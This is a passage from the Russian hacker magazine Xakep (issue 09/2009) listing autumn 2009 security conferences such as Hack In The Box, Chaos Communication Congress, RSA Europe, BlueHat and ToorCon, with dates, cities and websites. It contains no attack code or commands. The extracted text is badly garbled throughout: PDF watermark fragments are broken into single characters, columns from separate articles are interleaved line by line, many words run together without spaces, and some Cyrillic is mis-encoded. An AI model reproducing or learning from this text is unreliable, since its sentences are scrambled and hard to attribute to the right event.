|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
||
P |
|
|
|
|
|
NOW! |
o |
|
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
|
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
.c |
|
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1
3
2 |
|
4 |
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
HACKER HALTED USA |
обойдется и без уже традици- |
HACK IN THE BOX |
Например, шестаямеждународная |
Когда: 20-25 сентября |
онных игр по «захвату флага» и |
Когда: 5-8 октября |
специализированнаявыставка- |
Где: Майями, США |
многого, многого другого. Ску- |
Где: Куала-Лумпур, Малайзия |
конференцияпоинформационной |
Сайт: www.hackerhalted.com |
чать определенно не придется. |
Сайт: www.hackinthebox.org |
безопасностинамечается. Состо- |
Этаконфа— детище«Междуна- |
RAID |
Неуспелсъездитьотдохнуть |
итсяонавЭкспоцентренаКрасной |
родногосоветаконсультантовпо |
этимлетом? Тогдаутебяесть |
Пресне, вконцесентября— начале |
|
вопросамэлектроннойком- |
Когда: 23-25 сентября |
возможностьсовместитьотдых |
октября. ВыставкиInfosecurity |
мерции», аеслисокращенно— |
Где: Сен-Мало, Франция |
спосещениеминтересного |
проводятсяповсемумирус1996 |
EC-Council. Чуваки, вчастности, |
Сайт: www.rennes.supelec.fr/ |
форума— крупнейшаявАзии |
года, иихорганизациялежитна |
известнытем, чтоимеюткучу |
RAID2009 |
конференцияHack In The Box в |
плечахкомпанииReed Exhibitions |
всевозможныхсертификатов, в |
Еще одна французское ме- |
этомгодупройдетвМалайзии, |
— мировоголидеравобластипро- |
томчислеизаконныйсертифи- |
роприятие, только в отличие |
вКуала-Лумпуре. Будеттебеи |
ведениятакогородамероприятий. |
кат«этичныххакеров». Чтоэто |
от FRHACK — с многолетней |
отдых, ихак-фестивальвлучших |
Вэтомгодувпрограмменамечены |
такое? Всеоченьпросто— их |
историей: «Рэйду» уже 12 лет. По |
олдскульныхтрадициях. |
докладыведущихроссийских |
нанимают, чтобыонинестрашно |
сути, RAID не хакерская тусовка, |
СедьмаяпосчетуHITB неиз- |
спецоввобластиIT-безопасности, |
инебольновсевзломали, |
но весьма серьезный междуна- |
менитсебе— впрограмме, как |
техническиесеминарыибизнес- |
обнаруживпоходудырыибаги, |
родный симпозиум, на котором |
всегда, заявленыразнообразные |
секции. Средиосновныхтопиков |
которыепотомсамижеипомогут |
ежегодно собираются ведущие |
конкурсыповзломуиименитые |
Infosecurity: обеспечениеИБпри |
закрыть. |
исследователи и специалисты, |
спикеры, средикоторыхДжо |
ведениибизнеса, обсуждение |
Hacker Halted проводится уже |
представители компаний-лиде- |
Грант— президентGrand Idea |
законаоперсональныхданных, |
много лет в самых разных стра- |
ров индустрии, высшие долж- |
Studio иоснователиресурса |
проблемыинформационнойбезо- |
нах — от Дубая до США, и мероп- |
ностные лица и т.д. Ученые мужи |
wikileaks.org. Такжезаплани- |
пасностивбанковскомсекторе, ИБ |
риятие ориентировано далеко |
съезжаются во Францию с целью |
рованцелыйрядтренингов. |
вбеспроводныхсетяхит.д. |
не на казуалов. Так, в этом году |
обмена опытом по очень широ- |
Какпоказываютпредыдущие |
CHAOS |
в США ожидаются, например, |
кому спектру вопросов, посвя- |
годы— наHITB простонебывает |
|
выступления основателя rootkit. |
щенных защите систем и данных |
неинтересно, чересчурпафосно |
COMMUNICATION |
com Грега Хоглунда и профес- |
в любых видах и формах. На |
илипресно. |
CONGRESS |
сора Говарда Шмидта — экс |
перечисление запланированных |
INFOSECURITY |
Когда: 3-4 октября |
специального советника Белого |
к обсуждению топиков не хватит |
Где: Берлин, Германия |
|
дома по вопросам безопасности |
никакого места, к тому же, можно |
MOSCOW |
Сайт: www.ccc.de |
в киберпространстве. Кроме |
ограничиться и более общей |
Когда: 29 сентября — |
Одно из культовых и старейших |
них будет еще 46 (!) докладчи- |
формулировкой — все передовые |
1 октября |
хакерских сборищ на плане- |
ков. Пройдут в рамках Hacker |
достижения киберпреступников |
Где: Москва, Россия |
те — Chaos Communication |
Halted и различные семинары и |
и методы борьбы с ними будут |
Сайт: infosecuritymoscow.com |
Congress — проводится с 1984 |
тренинги, в том числе, посвя- |
обсуждать именно здесь. |
Читаешьидумаешь: «ачтожеу |
года! Все началось еще с хакер- |
щенные «этичному хакингу». Не |
|
нас»? Унастожевсевпорядке. |
ской коалиции Chaos Computer |
XÀÊÅÐ 09 /129/ 09 |
077 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|||
P |
|
|
|
|
|
NOW! |
o |
|
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
to |
BUY |
|
|
|
|
|
СЦЕНА |
w Click |
|
|
|
|
|
m |
|
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
|
.c |
|
|
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
1 |
|
2 |
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
|
|
|
|
Club, появившейся в 80-х. Тогда |
Думаешь, есливКанадеплот- |
мационнойбезопасностиикрип- |
Секьюрити-конференцияком- |
|
|
|
|
основателям Chaos Computer |
ностьнаселениясоставляет |
тографии. RSA ежегоднопроходит |
панииMicrosoft сзабавнымдля |
|
|
|
|
Club подумалось, что непло- |
всего3.29 чел./км2, абольшую |
каквстранахЕвропыиАзии, так |
русскоговорящихлюдейназва- |
|
|
|
|
хо бы организовать какое-то |
частьстранызанимаетсуровая |
ивСША, нокнамсейчасближе |
ниемBlueHat проводитсядваж- |
|
|
|
|
мероприятие для себя и своих |
севернаяприрода, тоздесьнет |
«европейскаяверсия» форума, |
дывгод, иосенне-зимняяуже |
|
|
|
|
единомышленников, где можно |
хорошиххак-конференций? Ко- |
котораясостоитсявЛондоне, в |
наподходе— состоитсявконце |
|
|
|
|
было бы встретиться и обсудить |
нечно, есть, иSecTor яркийтому |
20-хчислахоктября. Интересно, |
октября. Участникимероприятия |
|
|
|
|
самое наболевшее и актуальное. |
пример. Болеетого— официаль- |
чтокаждыйразRSA проходитпод |
гордоименуютсебя«голубыми |
|
|
|
|
В результате появился Chaos |
ныйсайтSecTor оченьнескромно |
знакомкакой-тоизвестнойисто- |
шляпами» (дляуменьшения |
|
|
|
|
Communication Congress. |
заявляет, чтовоктябревТоронто |
рическойличности, выборкоторой |
шоковогоэффектавнашихСМИ |
|
|
|
|
CCC нетолькодожилдонаших |
соберутсясамыеизощренныеи |
вомногомопределяетуклонвсего |
ихобычнозовут«синими»), что |
|
|
|
|
дней, носгодамилишьстал |
«темные» умысовсегонашего |
мероприятия. Впрошломгодуэто |
насамомделенеболеечемана- |
|
|
|
|
лучше. Когоздесьтольконе |
голубогошарика. «Злыегении» |
былАланТьюринг, авэтомвыбор |
логиясэтичнымихакерамиWhite |
|
|
|
|
встретишь— ежегоднособирает- |
собираютсяобсудитьсамыеост- |
палнаЭдгараАланаПо. |
hat ипофигистамиBlack hat. |
|
|
|
|
ся, всреднем, 2000-3500 человек, |
рыепроблемынашегокомпью- |
НаRSA традиционновыступят |
НаBlueHat v9 собираются |
|
|
|
|
средикоторыхипредставители |
терногонастоящего, восновном |
видныеIT-деятели, средикото- |
поговоритьоширокомспектре |
|
|
|
|
хак-сценысовсегомира, иразра- |
концентрируясь, конечноже, на |
рыхестьиэкспертысмировыми |
проблем, средитопиковзаяв- |
|
|
|
|
ботчикиПО, испецыпобезопас- |
вопросахсферыбезопасности. |
именами, идиректораогромных |
ленымобильные\беспроводные |
|
|
|
|
||||
|
|
|
|
|
|
|
девайсыималварьвсехмастей, |
|
|
|
|
КАЖДЫЙРАЗRSAПРОХОДИТПОДЗНАКОМКА- |
реверсныйинжинирингисозда- |
||
|
|
|
|
||||
|
|
|
|
ниеэксплойтовидругиенехоро- |
|||
|
|
|
|
КОЙ-ТОИЗВЕСТНОЙИСТОРИЧЕСКОЙЛИЧНОС- |
шиевещи. Словом, традиционно |
||
|
|
|
|
дляMicrosoft — будетнебезын- |
|||
|
|
|
|
ТИ,ВЫБОРКОТОРОЙВОМНОГОМОПРЕДЕЛЯЕТ |
тересно, нооченькультурнои«в |
||
|
|
|
|
рамках». |
|||
|
|
|
|
УКЛОНВСЕГОМЕРОПРИЯТИЯ.ВПРОШЛОМ |
TOORCON |
||
|
|
|
|
ГОДУЭТОБЫЛАЛАНТЬЮРИНГ,АВЭТОМЭДГАР |
Когда: 23-25 октября |
||
|
|
|
|
Где: Сан-диего, США |
|||
|
|
|
|
АЛАНПО. |
|
|
Сайт: www.toorcon.org |
|
|
|
|
|
|
Если у тебя нет желания слушать |
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
«синих шапок» на BlueHat, вот |
|
|
|
|
ности, идругиеинтересныекадры. |
Докладчики-экспертыизСША |
компаний. Вопросыобсуждаются |
тебе альтернатива — ToorCon, |
|
|
|
|
Какужеможнобылопонять, |
иКанадырасскажутипокажут |
серьезныеи, чтоназывается, «на |
проходящий почти в то же самое |
|
|
|
|
конференциянезацикливается |
немалоинтересного, азаплани- |
высшемуровне». RSA тотнечаст- |
время в солнечном Сан-Диего. |
|
|
|
|
насекьюрити-вопросах— об- |
рованныетренинги(например, |
ныйслучай, когдазамеропри- |
ToorCon конференция старая, |
|
|
|
|
суждаютвсе: новыеразработкии |
«Пониманиеатакчерезвеб- |
ятиемвполнеможнопоследить |
известная, с богатой 11-летней |
|
|
|
|
технологии, драконовскиезаконы, |
приложения»), видимо, будут |
удаленно, непосещаяеголично. |
историей. Мероприятие начи- |
|
|
|
|
хвастаютсясобственноручнона- |
настолькохороши, чтозаучастие |
Еслиты, конечно, неиспытыва- |
налось как тусовка для довольно |
|
|
|
|
писаннымитулзами, обзаводятся |
внихпросят, нимного, нимало, |
ешьострогожеланияпосмотреть |
узкого круга специалистов по |
|
|
|
|
интереснымизнакомствами. CCC |
тысячувечнозеленыхденег. |
на«сильныхмирасего» своими |
безопасности и в первые годы |
|
|
|
|
традиционнооткрытадлявсех |
RSA CONFERENCE |
глазами. |
собирало всего порядка 300-500 |
|
|
|
|
желающих, иоеепосещенииеще |
MS BLUEHAT |
человек, нонасегодняшнийдень |
|
|
|
|
|
никтонежалел:). |
(EUROPE) |
ToorCon вышел на совсем иной |
|
|
|
|
|
SECTOR |
Когда: 20-22 октября |
Когда: 22-23 октября |
уровень. Так же, как и Defcon, эта |
|
|
|
|
Где: Лондон, Великобритания |
Где: ÑØÀ |
конференция сумела с годами не |
|
|
|
|
|
Когда: 5-7 октября |
Сайт: www.rsaconference.com |
Сайт: www.microsoft.com/ |
растерять своего уникального |
|
|
|
|
Где: Торонто, Канада |
Оченьсерьезноемероприятие, |
technet/security/bluehat/default. |
духа и остается весьма «камер- |
|
|
|
|
Сайт: www.sector.ca |
стоящеена«двухкитах» — инфор- |
mspx |
ной», непафосной и интересной. |
078 |
XÀÊÅÐ 09 /129/ 09 |